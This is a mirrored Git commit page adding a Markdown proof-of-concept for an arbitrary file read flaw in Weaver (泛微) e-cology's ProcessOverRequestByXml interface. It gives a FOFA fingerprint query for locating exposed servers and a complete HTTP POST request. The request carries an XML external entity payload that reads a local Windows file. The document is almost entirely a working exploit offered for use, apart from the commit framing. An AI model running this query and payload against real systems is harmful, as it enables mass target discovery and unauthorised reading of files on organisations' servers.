mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
This commit is contained in:
parent
4939f58783
commit
cafa904594
21
泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
Normal file
21
泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
## 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞
|
||||||
|
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="/js/ecology8" || body="wui/common/css/w7OVFont_wev8.css" || (body="weaver" && body="ecology") || (header="ecology_JSessionId" && body="login/Login.jsp") || body="/wui/index.html" || body="jquery_wev8" && body="/login/Login.jsp?logintype=1"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Connection: close
|
||||||
|
Host: 127.0.0.1
|
||||||
|
Content-Type: application/xml
|
||||||
|
Content-Length: 146
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE test[<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><reset><syscode>&test;</syscode></reset>
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user